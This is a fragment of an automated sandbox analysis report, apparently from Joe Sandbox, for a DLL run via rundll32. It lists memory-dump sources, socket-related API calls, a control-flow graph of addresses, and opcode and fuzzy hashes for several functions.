                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +NaNinf00e00E0
                                    • API String ID: 0-248423880
                                    • Opcode ID: e03af7eff98612d667f33974eb37de08fb45994ebcffc1666481443cf5da295c
                                    • Instruction ID: 47c2cf92275acfff6e2c56f2c2712c2d5102f61e8f99b70a5c7f218a0214e066
                                    • Opcode Fuzzy Hash: e03af7eff98612d667f33974eb37de08fb45994ebcffc1666481443cf5da295c
                                    • Instruction Fuzzy Hash: 43D138A2B1974643EE388AE5A4B53F86691EB957C0F45C135DE6F17782EA3CA981C300

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$Socket$HandleInformationclosesocket
                                    • String ID:
                                    • API String ID: 3114377017-0
                                    • Opcode ID: e8fc91bdb7b020b4beb853b3fa1f019e79ab85ee67a59c7c9f006a5cf786e774
                                    • Instruction ID: 6dce74955e98a4239cacc6119de9ca4ed9d5378f21a6175f5abe4ec08160f85b
                                    • Opcode Fuzzy Hash: e8fc91bdb7b020b4beb853b3fa1f019e79ab85ee67a59c7c9f006a5cf786e774
                                    • Instruction Fuzzy Hash: 2B11D2B1B081A543FB701BB4A4A87A61651BB86BF4F14C330DD7D53BD5CE7DA8868700

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 317 7ffd9467b350-7ffd9467b361 318 7ffd9467b363-7ffd9467b368 317->318 319 7ffd9467b382-7ffd9467b384 317->319 320 7ffd9467b370-7ffd9467b377 318->320 321 7ffd9467b39a-7ffd9467b3ad 319->321 322 7ffd9467b386-7ffd9467b38e 319->322 320->319 323 7ffd9467b379-7ffd9467b380 320->323 325 7ffd9467b3b0-7ffd9467b3b2 321->325 322->321 324 7ffd9467b390-7ffd9467b399 322->324 323->319 323->320 326 7ffd9467b3b4-7ffd9467b3ba 325->326 327 7ffd9467b3bc-7ffd9467b3d8 WaitOnAddress 325->327 326->324 326->327 328 7ffd9467b3dd-7ffd9467b3e2 327->328 329 7ffd9467b3da GetLastError 327->329 328->325 330 7ffd9467b3e4-7ffd9467b3e9 328->330 329->328 331 7ffd9467b3f0-7ffd9467b3fa 330->331 331->325 332 7ffd9467b3fc-7ffd9467b400 331->332 332->331 333 7ffd9467b402 332->333 333->325
                                    APIs
                                    Strings
                                    • Box<dyn Any>fatal runtime error: the global allocator may not use TLS with destructors, xrefs: 00007FFD9467B354
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: AddressErrorLastWait
                                    • String ID: Box<dyn Any>fatal runtime error: the global allocator may not use TLS with destructors
                                    • API String ID: 1574541344-2368852436
                                    • Opcode ID: 95888f0208f9d67d365d0e94685335c9533744bf90259d2b06c0b209b77beb84
                                    • Instruction ID: 2f362556e17cf82640d418787fa8411f97796f494b2e76c51750944a5f236f01
                                    • Opcode Fuzzy Hash: 95888f0208f9d67d365d0e94685335c9533744bf90259d2b06c0b209b77beb84
                                    • Instruction Fuzzy Hash: 25110A72B0829144EA754A5524A06FD7B825BE3B7CF58C134DEF94B2C6CE1D98C3C700

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID: H
                                    • API String ID: 2781271927-2852464175
                                    • Opcode ID: 2b32ab530bf5a1cb137be957e997bed42ea83a23db5125ec291894482d05d486
                                    • Instruction ID: 0ca434b4d72054b33a5dfd544f5a7b03efe14d0d3b2b93d72c08e31bcad828ff
                                    • Opcode Fuzzy Hash: 2b32ab530bf5a1cb137be957e997bed42ea83a23db5125ec291894482d05d486
                                    • Instruction Fuzzy Hash: 9AE0A07274A10141EE26AB61F9A167953516F83BD8F54C434DE0C0768ACD3DE481C700